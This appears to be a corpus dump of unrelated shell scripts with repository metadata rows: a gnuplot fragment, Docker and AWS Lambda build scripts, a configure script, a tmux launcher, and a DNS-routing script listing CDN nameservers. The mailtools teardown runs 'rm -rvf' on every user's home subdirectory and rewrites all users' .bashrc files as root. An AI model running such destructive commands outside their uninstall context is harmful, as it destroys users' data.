theorie_title="Theorie"
decimalsign=","
else
xaxis="Sidereal Time / h"
yaxis="Azimuth"
zaxis="Displacement / λ"
data_title="Data"
theorie_title="Theory"
decimalsign="."
fi
gnuplot -e "aether_data_file='$1'; aether_x_axis='$xaxis';aether_y_axis='$yaxis';aether_z_axis='$zaxis';aether_data_title='$data_title';aether_theorie_title='$theorie_title';aether_title='$title';set terminal $term; set decimalsign '$decimalsign'" signal3d.gnuplot -
| true
|
645ed70c337a91e73d60a36c8ea166c5fb468af2
|
Shell
|
yejiayu/canary-release
|
/hack/make-rules/docker.sh
|
UTF-8
| 519
| 3.46875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Exit on error. Append "|| true" if you expect an error.
set -o errexit
# Do not allow use of undefined vars. Use ${VAR:-} to use an undefined VAR
set -o nounset
# Catch the error in case mysqldump fails (but gzip succeeds) in `mysqldump |gzip`
set -o pipefail
PRJ_ROOT=$(dirname "${BASH_SOURCE}")/../..
VERBOSE="${VERBOSE:-1}"
source "${PRJ_ROOT}/hack/lib/init.sh"
if [[ -n ${PRJ_DOCKER_BUILD-} ]]; then
docker::build_images "$@"
fi
if [[ -n ${PRJ_DOCKER_PUSH-} ]]; then
docker::push_images "$@"
fi
| true
|
c32acd34446bf11ce9f1b66df4974d7317a0cd8e
|
Shell
|
gpetters94/unixmailtools
|
/src/bin/sudo_teardown.sh
|
UTF-8
| 955
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/bash
################################################################################
# File: sudo_teardown.sh
# Path: /usr/lib/mailtools/bin
# Language: Bash
# Author: Nathaniel Lao (nlao@terpmail.umd.edu)
#
# Teardown script that runs when mailtools in uninstalled from the system.
# Undoes the actions of user_setup.sh. Note that this destructively deletes all
# associated mailtools files from ALL users.
################################################################################
printf "Deleting mailtools files for all users\n"
# Remove argument completer code reference
ls /home/ | xargs -I{} sh -c \
"grep -v 'source /usr/lib/mailtools/bin/arg_complete_mailtools.sh' /home/{}/.bashrc > /home/{}/.bashrc.tmp; \
cat /home/{}/.bashrc.tmp > /home/{}/.bashrc; \
rm /home/{}/.bashrc.tmp"
# Remove all .mailtools directories from all users
rm -rvf /home/*/.mailtools
# Remove all symbolic links to $home/.mailtools/results
rm -rvf /home/*/mail/Mailtools
| true
|
3a70d2dbea397b7a74da90e88825b8500c2a8acf
|
Shell
|
ykitamura-mdsol/sumologic-lambda-extensions
|
/scripts/zip.sh
|
UTF-8
| 2,655
| 3.921875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -x
# Assuming the zip.sh script is run from inside the scripts folder
# clean up of old target directories
cd ..
TARGET_DIR=target
if [ -d "$TARGET_DIR" ]; then
echo "removing old ${TARGET_DIR}"
rm -r ${TARGET_DIR};
fi
# Add GO packages to GOPATH. Not needed if you are using Go modules
# export GOPATH=${HOME}/GO:${PATH}:$(pwd)
echo "Creating an binary executable using the go build command for Linux Systems."
binary_name="sumologic-extension"
extension_bin_dir="${TARGET_DIR}/extensions"
extension_zip_dir="${TARGET_DIR}/zip"
mkdir -p ${extension_bin_dir}
mkdir -p ${extension_zip_dir}
env GOOS=linux go build -o "${extension_bin_dir}/${binary_name}" "lambda-extensions/${binary_name}.go"
status=$?
if [ $status -ne 0 ]; then
echo "Binary Generation Failed"
exit 1
fi
chmod +x "${extension_bin_dir}/${binary_name}"
echo "Creating the Zip file binary in extension folder."
cd ${TARGET_DIR}
zip -r "zip/${binary_name}.zip" extensions/
status=$?
if [ $status -ne 0 ]; then
echo "Zip Generation Failed"
exit 1
fi
cd ..
echo "Create lambda Layer from the new ZIP file in the provided AWS_PROFILE aws account."
if [[ -z "${AWS_PROFILE}" ]]; then
export AWS_PROFILE="personal"
fi
AWS_REGIONS=(
us-east-1
us-east-2
eu-north-1
ap-south-1
eu-west-3
eu-west-2
eu-south-1
eu-west-1
ap-northeast-2
me-south-1
ap-northeast-1
sa-east-1
ca-central-1
ap-east-1
ap-southeast-1
ap-southeast-2
eu-central-1
us-west-1
us-west-2
)
echo "Using AWS_PROFILE: ${AWS_PROFILE}"
# We have layer name as sumologic-extension. Please change name for local testing.
layer_name=${binary_name}
for region in "${AWS_REGIONS[@]}"; do
layer_version=$(aws lambda publish-layer-version --layer-name ${layer_name} \
--description "The SumoLogic Extension collects lambda logs and send it to Sumo Logic." \
--license-info "Apache-2.0" --zip-file fileb://$(pwd)/${TARGET_DIR}/zip/${layer_name}.zip \
--profile ${AWS_PROFILE} --region ${region} --output text --query Version )
echo "Layer Arn: arn:aws:lambda:${region}:<accountId>:layer:${layer_name}:${layer_version} deployed to Region ${region}"
echo "Setting public permissions for layer version: ${layer_version}"
aws lambda add-layer-version-permission --layer-name ${layer_name} --statement-id ${layer_name}-prod --version-number $layer_version --principal '*' --action lambda:GetLayerVersion --region ${region}
# aws lambda add-layer-version-permission --layer-name ${layer_name} --statement-id ${layer_name}-dev --version-number ${layer_version} --principal '956882708938' --action lambda:GetLayerVersion --region ${region}
done
| true
|
082cb8af8d66aca2cbad872109919aa561337e24
|
Shell
|
legato-project/FinalSoftwareStack
|
/Samples/matmul-cuda-opencl/configure.sh
|
UTF-8
| 3,023
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/bash -ex
ROOTNAME=$(readlink -f $(dirname ${BASH_SOURCE[0]}))
if [ "X$1" == "X--pack" ];
then
pushd $ROOTNAME
git archive --format=tar.gz --output=ompss-ee.tar.gz --prefix=ompss-ee/ HEAD \
|| { echo >&2 "Option --pack requires git. Aborting"; exit 1; }
popd
exit 0
fi
if [ "X$1" == "X--wipe" ];
then
pushd $ROOTNAME
for first in `ls -d ??-*/ | cut -f1 -d'/'`;
do
echo Entering... $first
pushd $first
for second in `ls -d */ | cut -f1 -d'/'`;
do
echo Entering... $second
pushd $second
make wipe
popd
done
popd
done
popd
exit 0
fi
echo Initial configuration...
export BSC_MACHINE=csic-stratix
if [ "X$BSC_MACHINE" == "X" ]; then
export BSC_MACHINE=default
fi
source $ROOTNAME/common-files/configure_$BSC_MACHINE
# Setting environment variables
export PATH=$OMPSS_HOME/bin:$PATH
export PATH=$DLB_HOME/bin:$PATH
export PATH=$EXTRAE_HOME/bin/:$PATH
export PATH=$PARAVER_HOME/bin:$PATH
export PATH=$TEMANEJO_HOME/bin:$PATH
export PATH=$MPI_HOME/bin:$PATH
export LD_LIBRARY_PATH=$MPI_LIB_DIR:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$MKL_LIB_DIR:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$ATLAS_LIB_DIR:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$TEMANEJO_HOME/lib:$LD_LIBRARY_PATH
echo Basic configuration...
# Checking configuration, verbosing configuration
if [ ! -f $OMPSS_HOME/bin/mcc ]; then
echo \ \ WARNING: Mercurium compiler not found!
else
echo \ \ Mercurium compiler at $OMPSS_HOME/bin
fi
if [ ! -f $EXTRAE_HOME/bin/mpi2prv ]; then
echo \ \ WARNING: Extrae library not found!
else
echo \ \ Extrae library at $EXTRAE_HOME/bin
fi
if [ ! -f $PARAVER_HOME/bin/wxparaver ]; then
echo \ \ WARNING: Paraver utility not found!
else
echo \ \ Paraver utility at $PARAVER_HOME/bin
fi
if [ ! -f $TEMANEJO_HOME/bin/Temanejo ]; then
echo \ \ WARNING: Temanejo utility not found!
else
echo \ \ Temanejo utility at $TEMANEJO_HOME/bin
fi
echo Job schedule SMP configuration preface...
if [ ! -f $ROOTNAME/common-files/sched-job-smp ]; then
echo \ \ WARNING: Job schedule file for SMP is not configured for this machine!
else
cat $ROOTNAME/common-files/sched-job-smp
fi
echo Job schedule MPI configuration preface...
if [ ! -f $ROOTNAME/common-files/sched-job-mpi ]; then
echo \ \ WARNING: Job schedule file for MPI is not configured for this machine!
else
cat $ROOTNAME/common-files/sched-job-mpi
fi
echo Aditional libraries...
if [ ! -f $MPI_LIB_DIR/libmpi.so ]; then
echo \ \ WARNING: MPI library is not found, some tests will not be compiled!
else
echo \ \ MPI library at $MPI_LIB_DIR
fi
if [ ! -f $MKL_LIB_DIR/libmkl_sequential.so ]; then
echo \ \ WARNING: MKL library is not found, some tests will not be compiled!
else
echo \ \ MKL library at $MKL_LIB_DIR
fi
if [ ! -f $ATLAS_LIB_DIR/libatlas.a ]; then
echo \ \ WARNING: ATLAS library is not found, some tests will not be compiled!
else
echo \ \ ATLAS library at $ATLAS_LIB_DIR
fi
| true
|
1f7c99d73de08f63bac1b48f1b5a89a2379f17ad
|
Shell
|
webee/rc
|
/scripts/mytmux.sh
|
UTF-8
| 403
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
if [ "$1" == '.' ];then
shift;
exec tmux $*
exit 0
fi
name=$1
n=$2
if [ "$name" == "" ];then
name="work"
fi
if tmux ls|grep -q "^$name";then
tmux attach-session -t $name
exit 0
fi
if [ "$n" == "" ];then
n=4
fi
tmux new-session -s $name -d
while [ $n -gt 1 ];do
tmux neww -t $name
n=$[$n-1]
done
tmux next-window -t $name
tmux attach-session -t $name
| true
|
56454e5f831731342641ec31b42e901cea1c529f
|
Shell
|
ycc0804/test
|
/route-dns
|
UTF-8
| 40,516
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
# 用于在长宽8台dns上添加到ICP DNS服务器的路由
# When you add a DNS server, these need to be added:
# IP_dns?=
# GW_dns?=
# get_my_ip() - add a match variable
# 'case `get_my_ip` in' part.
LOG=`realpath $0`.log
MANUAL_MODE=1
NXIP="127.126.125.124
124.14.10.117
124.14.8.196
"
case ${HOSTNAME} in
dns[7]) NIC="eno1";;
dns[4]) NIC="eth2";;
dns[25]) NIC="eth4";;
SH-RE-1.shpbs.com) NIC="em1";;
SH-RE-2.shpbs.com) NIC="em1";;
SH-RE-3.shpbs.com) NIC="em4";;
SH-RE-4.shpbs.com) NIC="em4";;
*) NIC="eth0"
esac
ADDRESS_LIST= # init first, used while add/del.
ADDRESS_LIST_ALL= # init first, contains all domainname or IP segments.
# 'ip' command must be exist.
which ip >/dev/null 2>&1 || {
echo "'ip' command not found, exit now"
exit 1
}
# root only program
[ $EUID -ne 0 ] && {
echo "Only for root"
exit 1
}
# ip/gw pairs
IP_dns1="211.161.192.1"
GW_dns1="211.161.192.6"
IP_dns2="211.161.192.73"
GW_dns2="211.161.192.76"
IP_dns3="211.161.192.13"
GW_dns3="211.161.192.14"
IP_dns4="220.115.251.73"
GW_dns4="220.115.251.74"
IP_dns5="211.161.192.9"
GW_dns5="211.161.192.10"
IP_dns6="211.161.192.65"
GW_dns6="211.161.192.70"
IP_dns7="211.161.192.66"
GW_dns7="211.161.192.70"
IP_dns8="211.161.192.67"
GW_dns8="211.161.192.70"
IP_ns1="101.44.0.58"
GW_ns1="101.44.0.49"
IP_ns2="101.44.0.57"
GW_ns2="101.44.0.49"
IP_ns5="211.161.192.89"
GW_ns5="211.161.192.94"
IP_ns6="211.161.192.90"
GW_ns6="211.161.192.94"
IP_ns7="211.161.192.91"
GW_ns7="211.161.192.94"
IP_ns8="211.161.192.92"
GW_ns8="211.161.192.94"
IP_yd1="211.161.193.129"
GW_yd1="211.161.193.134"
IP_yd2="211.161.193.130"
GW_yd2="211.161.193.134"
IP_yd3="211.161.192.68"
GW_yd3="211.161.192.70"
IP_yd4="211.161.192.69"
GW_yd4="211.161.192.70"
IP_re1="211.161.250.41"
GW_re1="211.161.250.46"
IP_re2="211.161.250.42"
GW_re2="211.161.250.46"
IP_re3="211.161.192.36"
GW_re3="211.161.192.38"
IP_re4="211.161.192.35"
GW_re4="211.161.192.38"
IP_test="1.1.1.1"
GW_test="1.1.1.2"
MYDNS=$IP_dns1
ADDRESS_LIST_ALL="
##### CDN provider #####
# TAG: DiLian CDN
# DNS域名后面跟的IP都是帝联给的,让我们把整个域转发到这些IP
# tlgslb.com
dns1.tlgslb.com
dns2.tlgslb.com
dns3.tlgslb.com
dns4.tlgslb.com
dns5.tlgslb.com
dns6.tlgslb.com
58.221.37.144
180.153.116.246
222.73.184.197
122.11.48.182
123.125.163.61
120.209.132.6
121.9.221.96
122.225.251.146
122.228.203.145
125.64.129.88
60.28.227.11
125.64.148.135
60.28.183.6
58.221.40.80
58.221.40.74
58.221.40.75
58.221.40.76
122.11.46.91
121.14.254.31
183.131.86.24
220.166.65.88
125.39.237.30
219.153.76.161
119.84.107.57
# TAG: Ucloud CDN
ns1.cdndo.com
ns2.cdndo.com
ns3.cdndo.com
ns4.cdndo.com
ns5.cdndo.com
# fastcdn.com
dns1.fastcdn.com
dns2.fastcdn.com
dns3.fastcdn.com
dns4.fastcdn.com
dns5.fastcdn.com
dns6.fastcdn.com
dns7.fastcdn.com
202.120.161.67
211.154.219.19
122.11.48.181
61.129.57.10
60.28.227.10
60.28.227.13
58.221.37.145
60.28.160.53
58.221.247.79
60.210.23.14
60.210.23.73
59.39.31.41
125.64.131.2
118.123.112.40
# ewcache.com
ns1.ewcache.com
ns2.ewcache.com
ns3.ewcache.com
ns4.ewcache.com
60.28.161.158
60.28.183.99
115.238.226.71
122.228.218.36
59.39.31.40
180.153.116.245
# flxdns.com
dns1.flxdns.com
dns2.flxdns.com
dns3.flxdns.com
dns4.flxdns.com
dns5.flxdns.com
222.73.177.166
123.125.163.93
121.9.240.239
60.210.16.92
122.228.218.80
# globalcdn.cn
123.125.163.24
222.73.184.196
121.9.240.230
60.210.16.102
60.28.183.179
# dn-dns.com
dns2.dn-dns.com
dns3.dn-dns.com
dns4.dn-dns.com
# ttxshy.com
dns1.ttxshy.com
dns2.ttxshy.com
# gls.acadn.com
dns1.acadn.com
dns2.acadn.com
dns3.acadn.com
dns4.acadn.com
dns5.acadn.com
ns.acadn.com
122.11.50.159
203.110.169.43
58.67.161.27
61.155.106.90
111.161.19.62
61.153.108.34
121.11.70.131
# TAG: KuaiWang CDN
# hacdn.net
122.228.227.139
183.61.182.139
61.190.112.9
124.126.251.55
124.126.251.56
118.180.0.9
ns1.hacdn.net
ns2.hacdn.net
ns3.hacdn.net
ns4.hacdn.net
ns5.hacdn.net
ns6.hacdn.net
ns7.hacdn.net
ns8.hacdn.net
ns1.cloudtcp.net
ns2.cloudtcp.net
ns3.cloudtcp.net
ns4.cloudtcp.net
ns5.cloudtcp.net
ns6.cloudtcp.net
ns7.cloudtcp.net
ns8.cloudtcp.net
# hadns.net
ns1.hadns.net
ns2.hadns.net
ns3.hadns.net
ns4.hadns.net
ns5.hadns.net
ns6.hadns.net
ns7.hadns.net
ns8.hadns.net
# cachecn.com
ns1.cachecn.com
ns2.cachecn.com
ns3.cachecn.com
ns4.cachecn.com
ns5.cachecn.com
ns6.cachecn.com
ns7.cachecn.com
ns8.cachecn.com
# cloudcdn.net
ns1.sz-dns.net
ns2.sz-dns.net
ns3.sz-dns.net
ns4.sz-dns.net
ns5.sz-dns.net
ns6.sz-dns.net
# cloudglb.com
ns1.cloudglb.com
ns2.cloudglb.com
ns3.cloudglb.com
ns4.cloudglb.com
ns5.cloudglb.com
ns6.cloudglb.com
ns7.cloudglb.com
ns8.cloudglb.com
ns9.cloudglb.com
ns10.cloudglb.com
# ctycdn.net
ns1.ctycdn.net
ns2.ctycdn.net
ns3.ctycdn.net
ns4.ctycdn.net
# ctycdn.com
ns1.ctycdn.com
ns2.ctycdn.com
ns3.ctycdn.com
ns4.ctycdn.com
# fastweb.com.cn
# 此域名暂时无业务
# TAG: LanXun CDN
# All postfixes:
# ccgslb.com
# ccgslb.com.cn
# ccgslb.net
# chinacache.net
# speedupchinacache.net
# lxsvc.cn
# xgslb.net
# xgslb.com
# ccgslb.net
ns1.ccgslb.net
ns2.ccgslb.net
ns3.ccgslb.net
ns6.ccgslb.net
ns8.ccgslb.net
ns12.ccgslb.net
ns15.ccgslb.net
ns16.ccgslb.net
ns17.ccgslb.net
ns18.ccgslb.net
ns19.ccgslb.net
ns4.ccgslb.net
ns5.ccgslb.net
ns7.ccgslb.net
ns1.cnc.ccgslb.net
ns2.cnc.ccgslb.net
ns6.cnc.ccgslb.net
ns7.cnc.ccgslb.net
ns8.cnc.ccgslb.net
ns9.cnc.ccgslb.net
ns10.cnc.ccgslb.net
ns11.cnc.ccgslb.net
ns12.cnc.ccgslb.net
ns13.cnc.ccgslb.net
ns12.cnc.ccgslb.net
ns21.cnc.ccgslb.net
ns22.cnc.ccgslb.net
ns3.cnc.ccgslb.net
ns10.cnc.ccgslb.net
ns9.cnc.ccgslb.net
ns1.tel.ccgslb.net
ns2.tel.ccgslb.net
ns3.tel.ccgslb.net
ns5.tel.ccgslb.net
ns8.tel.ccgslb.net
ns9.tel.ccgslb.net
ns10.tel.ccgslb.net
ns11.tel.ccgslb.net
ns12.tel.ccgslb.net
ns13.tel.ccgslb.net
ns14.tel.ccgslb.net
ns15.tel.ccgslb.net
ns16.tel.ccgslb.net
ns17.tel.ccgslb.net
ns12.tel.ccgslb.net
ns13.tel.ccgslb.net
ns16.tel.ccgslb.net
ns18.tel.ccgslb.net
ns22.tel.ccgslb.net
ns21.tel.ccgslb.net
# ccgslb.com
ns2.ccgslb.com
ns7.ccgslb.com
ns8.ccgslb.com
ns9.ccgslb.com
ns14.ccgslb.com
ns15.ccgslb.com
ns17.ccgslb.com
# ccgslb.com.cn
ns1.ccgslb.com.cn
ns2.ccgslb.com.cn
ns4.ccgslb.com.cn
ns5.ccgslb.com.cn
ns6.ccgslb.com.cn
ns7.ccgslb.com.cn
ns12.ccgslb.com.cn
ns15.ccgslb.com.cn
ns16.ccgslb.com.cn
ns17.ccgslb.com.cn
ns19.ccgslb.com.cn
ns20.ccgslb.com.cn
ns21.ccgslb.com.cn
ns22.ccgslb.com.cn
ns23.ccgslb.com.cn
ns24.ccgslb.com.cn
ns25.ccgslb.com.cn
ns26.ccgslb.com.cn
ns1.cnc.ccgslb.com.cn
ns4.cnc.ccgslb.com.cn
ns5.cnc.ccgslb.com.cn
ns6.cnc.ccgslb.com.cn
ns7.cnc.ccgslb.com.cn
ns8.cnc.ccgslb.com.cn
ns9.cnc.ccgslb.com.cn
ns10.cnc.ccgslb.com.cn
ns11.cnc.ccgslb.com.cn
ns12.cnc.ccgslb.com.cn
ns13.cnc.ccgslb.com.cn
ns14.cnc.ccgslb.com.cn
ns15.cnc.ccgslb.com.cn
ns16.cnc.ccgslb.com.cn
ns17.cnc.ccgslb.com.cn
ns18.cnc.ccgslb.com.cn
ns19.cnc.ccgslb.com.cn
ns20.cnc.ccgslb.com.cn
ns21.cnc.ccgslb.com.cn
ns22.cnc.ccgslb.com.cn
ns23.cnc.ccgslb.com.cn
ns24.cnc.ccgslb.com.cn
ns25.cnc.ccgslb.com.cn
ns26.cnc.ccgslb.com.cn
ns27.cnc.ccgslb.com.cn
ns1.tel.ccgslb.com.cn
ns2.tel.ccgslb.com.cn
ns3.tel.ccgslb.com.cn
ns5.tel.ccgslb.com.cn
ns6.tel.ccgslb.com.cn
ns7.tel.ccgslb.com.cn
ns8.tel.ccgslb.com.cn
ns9.tel.ccgslb.com.cn
ns10.tel.ccgslb.com.cn
ns13.tel.ccgslb.com.cn
ns14.tel.ccgslb.com.cn
ns15.tel.ccgslb.com.cn
ns16.tel.ccgslb.com.cn
ns17.tel.ccgslb.com.cn
ns21.tel.ccgslb.com.cn
ns22.tel.ccgslb.com.cn
# chinacache.net
ns1.chinacache.net
ns2.chinacache.net
ns3.chinacache.net
ns4.chinacache.net
ns5.chinacache.net
ns6.chinacache.net
ns7.chinacache.net
ns8.chinacache.net
ns10.chinacache.net
ns12.chinacache.net
ns15.chinacache.net
ns16.chinacache.net
ns17.chinacache.net
ns18.chinacache.net
ns19.chinacache.net
ns21.chinacache.net
ns22.chinacache.net
ns23.chinacache.net
ns24.chinacache.net
ns100.chinacache.net
ns2.cnc.chinacache.net
ns3.cnc.chinacache.net
ns4.cnc.chinacache.net
ns1.cncssr.chinacache.net
ns2.cncssr.chinacache.net
ns3.cncssr.chinacache.net
ns4.cncssr.chinacache.net
ns5.cncssr.chinacache.net
ns6.cncssr.chinacache.net
ns7.cncssr.chinacache.net
ns9.cncssr.chinacache.net
ns11.cncssr.chinacache.net
ns12.cncssr.chinacache.net
ns13.cncssr.chinacache.net
ns14.cncssr.chinacache.net
ns15.cncssr.chinacache.net
ns16.cncssr.chinacache.net
ns17.cncssr.chinacache.net
ns19.cncssr.chinacache.net
ns20.cncssr.chinacache.net
ns21.cncssr.chinacache.net
ns22.cncssr.chinacache.net
ns23.cncssr.chinacache.net
ns24.cncssr.chinacache.net
ns1.tel.chinacache.net
ns2.tel.chinacache.net
ns3.tel.chinacache.net
ns1.telssr.chinacache.net
ns2.telssr.chinacache.net
ns4.telssr.chinacache.net
ns5.telssr.chinacache.net
ns6.telssr.chinacache.net
ns8.telssr.chinacache.net
ns9.telssr.chinacache.net
ns11.telssr.chinacache.net
ns12.telssr.chinacache.net
ns13.telssr.chinacache.net
ns14.telssr.chinacache.net
ns15.telssr.chinacache.net
ns16.telssr.chinacache.net
ns17.telssr.chinacache.net
ns18.telssr.chinacache.net
ns19.telssr.chinacache.net
# lxsvc.cn
ns1.lxsvc.cn
ns2.lxsvc.cn
ns3.lxsvc.cn
ns6.lxsvc.cn
ns7.lxsvc.cn
ns8.lxsvc.cn
# xgslb.net
ns1.xgslb.net
ns2.xgslb.net
ns3.xgslb.net
ns4.xgslb.net
nsx1.xgslb.net
nsx3.xgslb.net
# TAG: WangSu CDN
# lxdns.com
ns1.lxdns.com
ns2.lxdns.com
ns3.lxdns.com
ns4.lxdns.com
ns5.lxdns.com
n1.lxdns.com
n2.lxdns.com
n3.lxdns.com
n4.lxdns.com
n5.lxdns.com
dns1.speedcdns.info
dns2.speedcdns.info
dns3.speedcdns.info
dns4.speedcdns.info
dns5.speedcdns.info
# glb0.lxdns.com, 下面几个地址都是这个域名的DNS
# 125.78.241.150 # ns1.glb0.lxdns.com removed, 2013-01-18
220.162.97.201 # ns1.glb0.lxdns.com added, 2014-05-12
61.158.133.40 # ns2.glb0.lxdns.com
112.124.27.108 # ns3.glb0.lxdns.com
# 218.60.31.153 # ns4.glb0.lxdns.com removed, 2012-12-12
220.162.97.203 # ns4.glb0.lxdns.com added, 2012-05-12
125.39.1.116 # ns5.glb0.lxdns.com
175.25.171.11
222.163.201.17
125.39.1.113
111.202.74.156
220.162.97.202
139.209.90.42
183.131.210.112
111.202.74.154
218.76.105.64
60.220.197.11
222.218.45.170
221.202.204.227
113.107.112.205
115.231.20.69
222.163.201.19
111.202.74.147
180.97.178.220
113.107.112.236
221.202.204.232
150.138.173.201
113.107.57.72
14.215.100.33
14.215.93.35
60.223.235.133
113.107.57.68
222.186.18.62
61.158.133.42
113.107.57.70
125.39.1.117
115.231.84.171
115.231.87.249
58.220.6.137
ns1.glb0.lxdns.com
ns2.glb0.lxdns.com
ns3.glb0.lxdns.com
ns4.glb0.lxdns.com
ns5.glb0.lxdns.com
# image.suning.cn
gns2.zdnscloud.net.cn
gns1.zdnscloud.net
lns1.zdnscloud.info
lns2.zdnscloud.biz
# wscdns.com
ns1.wscdns.com
ns2.wscdns.com
ns3.wscdns.com
ns4.wscdns.com
ns5.wscdns.com
# wasu.cn
ns1.wasu.cn
ns2.wasu.cn
ns3.wasu.cn
ns4.wasu.cn
# lecloud.com
ns1.lecloud.com
ns2.lecloud.com
ns3.lecloud.com
ns4.lecloud.com
ns1.cdnle.com
ns2.cdnle.com
ns3.cdnle.com
ns4.cdnle.com
ns5.cdnle.com
# cdnle.com
123.126.32.220
106.38.226.228
115.182.200.243
119.147.182.213
119.188.180.227
# lsyun.net
123.59.126.241
123.125.36.248
36.110.223.246
124.95.177.14
115.238.243.244
# gslb.lecloud.com
123.125.36.245
123.59.126.242
36.110.223.99
ns1.gslb.coop.lecloud.com
ns2.gslb.coop.lecloud.com
ns3.gslb.coop.lecloud.com
ns4.gslb.coop.lecloud.com
ns5.gslb.coop.lecloud.com
ns6.gslb.coop.lecloud.com
ns7.gslb.coop.lecloud.com
ns8.gslb.coop.lecloud.com
ns1.gslb.lecloud.com
ns2.gslb.lecloud.com
dns1.ourglb0.info
dns2.ourglb0.info
dns3.ourglb0.info
dns4.ourglb0.info
dns1.ourglb0.org
dns2.ourglb0.org
dns3.ourglb0.org
# WangSu all NS IPs
114.114.116.138
106.38.250.143
107.155.17.59
107.155.21.130
107.155.29.130
110.53.182.78
111.12.13.162
111.20.128.227
111.23.12.40
111.40.216.74
111.47.198.137
111.7.175.135
112.253.2.205
112.25.85.9
112.29.134.75
112.5.61.115
113.13.30.116
113.207.31.202
113.207.37.131
113.6.235.243
113.6.248.75
114.80.216.202
115.231.223.11
116.114.17.101
116.55.253.141
117.131.199.67
117.139.22.76
117.145.178.171
117.169.17.201
117.23.59.51
1.180.238.212
119.254.210.112
1.193.152.82
119.84.53.202
120.41.38.67
122.143.7.211
122.143.7.212
122.70.129.50
123.134.184.140
123.138.255.133
123.59.102.14
123.59.102.18
124.126.250.69
124.14.10.99
124.239.189.5
125.17.240.6
125.39.59.20
125.64.98.17
139.209.92.72
14.18.201.81
150.138.141.86
153.36.201.18
163.177.115.100
171.15.197.95
1.82.232.14
183.131.160.178
183.131.64.216
183.2.219.210
183.245.146.21
183.61.63.115
203.19.33.30
218.60.32.77
218.65.177.15
220.170.181.136
220.194.215.143
221.13.157.138
221.180.139.195
221.195.4.26
221.204.210.203
222.161.223.148
222.175.136.91
222.186.137.228
222.222.207.140
223.111.12.58
223.99.236.180
39.130.133.34
42.202.143.195
42.236.123.142
42.247.12.197
58.211.21.41
58.218.206.10
58.222.16.23
58.252.187.172
58.51.95.181
59.46.7.41
59.53.70.198
60.12.124.141
60.221.222.10
61.156.196.70
61.164.246.21
61.184.203.23
61.190.149.200
65.153.158.131
65.153.158.196
65.153.196.131
# TAG: ksyunacc.com
120.131.7.211
120.131.7.212
120.92.128.233
120.92.128.234
# ksyuncdn.com
120.131.7.209
120.92.128.236
58.220.38.189
153.99.244.189
##### web sites #####
# TAG: alibaba-taobao
ns1.taobao.com
ns2.taobao.com
ns3.taobao.com
ns4.taobao.com
ns5.taobao.com
ns6.taobao.com
ns7.taobao.com
gslbns1.taobao.com
gslbns2.taobao.com
gslbns3.taobao.com
splitns1.taobao.com
splitns2.taobao.com
splitns3.taobao.com
danuoyins1.tbcache.com # img01.taobao.com
danuoyins2.tbcache.com
danuoyins3.tbcache.com
danuoyins4.tbcache.com.
danuoyins5.tbcache.com.
danuoyins8.tbcache.com.
danuoyins9.tbcache.com.
danuoyins6.tbcache.com.
danuoyins7.tbcache.com.
danuoyinewns1.gds.alicdn.com
danuoyinewns2.gds.alicdn.com
danuoyinewns3.gds.alicdn.com
danuoyinewns4.gds.alicdn.com
ns1.alikunlun.com
ns2.alikunlun.com
ns3.alikunlun.com
ns4.alikunlun.com
ns5.alikunlun.com
ns1.alikunlun.net
ns2.alikunlun.net
ns3.alikunlun.net
ns4.alikunlun.net
# ns1.alipaydns.com
# ns2.alipaydns.com
ns3.alipaydns.com
ns4.alipaydns.com
# ns5.alipaydns.com # 2012-10-26 14:32:19 = NXDOMAIN
# ns6.alipaydns.com # 2012-10-26 14:32:39 = NXDOMAIN
ns1.alipay.com
ns2.alipay.com
ns3.alipay.com
ns4.alipay.com
ns1.aliyun.com
ns2.aliyun.com
ns3.aliyun.com
ns4.aliyun.com
ns5.aliyun.com
ns1.alisoft.com
ns2.alisoft.com
# Same DNSs
# ns1.alisoft.com => gdns1.aliyun.com
# ns2.alisoft.com => gdns2.aliyun.com
gdns1.aliyun.com
gdns2.aliyun.com
ns1.aliedge.com
ns2.aliedge.com
ns3.aliedge.com
ns4.aliedge.com
gdsns1.alibabadns.com
gdsns2.alibabadns.com
cgsdns1.alibabaonline.com
cgsdns2.alibabaonline.com
ns8.alibabaonline.com
nshz.alibabaonline.com
nsp.alibabaonline.com
205.204.114.1 # nsp.alibabaonline.com 2001:470:20::2 才能解析到此地址
nsp2.alibabaonline.com
205.204.114.2 # nsp2.alibabaonline.com 2001:470:20::2 才能解析到此地址
tpdns1.alibabaonline.com
tpdns2.alibabaonline.com
tpdns3.alibabaonline.com
tpdns4.alibabaonline.com
ns1.koubei.com
ns2.koubei.com
ns3.koubei.com
ns4.koubei.com
ns1.alimama.com
ns2.alimama.com
nscm2.alimama.com
nscm3.alimama.com
nscm4.alimama.com
# hichinacdn.net 权威NS是ns[4-7].taobao.com, 可能是淘宝旗下的
ans1.hichinacdn.net
ans2.hichinacdn.net
ans3.hichinacdn.net
gslbns1.hichinacdn.net
gslbns2.hichinacdn.net
gslbns3.hichinacdn.net
# for cnspeedtest.cn
dns31.hichina.com
dns32.hichina.com
# in aliyun, bilibili.tv
ns1.hdslb.net
ns2.hdslb.net
ns3.hdslb.net
# TAG: CDNZZ
123.150.204.133
183.61.242.57
61.139.175.254
123.134.94.180
163.177.173.4
112.25.55.97
117.172.6.130
192.240.126.66
50.7.150.18
119.81.197.194
# TAG: alibaba-AS 37963
42.96.128.0/17
42.120.0.0/15
42.156.128.0/17
110.75.0.0/16
110.76.0.0/19
110.76.32.0/20
110.173.192.0/19
112.124.0.0/16
112.127.0.0/16
114.215.0.0/16
115.28.0.0/15
115.124.16.0/22
119.38.216.0/21
119.42.224.0/20
119.42.242.0/23
119.42.244.0/22
121.0.16.0/20
121.196.0.0/14
140.205.0.0/16
203.209.250.0/23
218.244.128.0/19
223.4.0.0/14
# TAG: 360safe
ns1.qhcdn.com
ns2.qhcdn.com
ns3.qhcdn.com
ns4.qhcdn.com
ns5.qhcdn.com
ns6.qhcdn.com
ns7.qhcdn.com
ns8.qhcdn.com
dns1.360safe.com
dns2.360safe.com
dns3.360safe.com
dns4.360safe.com
dns5.360safe.com
dns6.360safe.com
dns7.360safe.com
dns8.360safe.com
dns9.360safe.com
